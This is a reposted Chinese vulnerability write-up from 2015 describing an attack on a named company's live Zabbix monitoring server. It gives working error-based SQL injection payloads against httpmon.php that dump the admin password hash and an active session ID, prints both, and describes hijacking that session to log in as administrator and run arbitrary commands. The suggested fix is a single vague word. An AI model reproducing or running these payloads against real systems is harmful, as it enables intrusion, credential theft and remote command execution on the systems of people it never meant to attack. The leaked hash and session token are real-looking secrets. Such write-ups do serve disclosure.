鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

盛大广告ZabbixSQL注入导致命令执行及修复

来源:互联网 作者:佚名 时间:2015-06-30 08:20
盛大广告 Zabbix地址 http://zabbix.sa.snyu.com/ guest没禁用 先用guest直接登陆 然后来到这里 检测发现报错 尝试构造语句注入 httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passw
盛大广告 Zabbix地址 http://zabbix.sa.snyu.com/
 
guest没禁用 先用guest直接登陆
 
然后来到这里 检测发现报错
 
尝试构造语句注入
 
 
httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
 
爆出干货 
 
adnin 21bf5f24883e20465a9876c4aa8a4dc9
 
无奈小弟能力有限 21bf5f24883e20465a9876c4aa8a4dc9 MD5解不开 换个思路继续
 
尝试cookie欺骗 构造语句
 
 
httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid=1 LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
 
爆出session
 
 
session:00afc31ea35f3f156ebb5c4b3b119be3
 
然后进行欺骗 直接替换zbx_sessionid为这个00afc31ea35f3f156ebb5c4b3b119be3
 
成功以administrator登陆
 
再来到这里 指令随意改
 
然后来到这里 可以执行刚才设置的指令
 
 

就到这里了 继续的话你懂得 我就不试了.
 
 
 
修复方案:

过滤~
你比我懂~
 
 
网友评论
<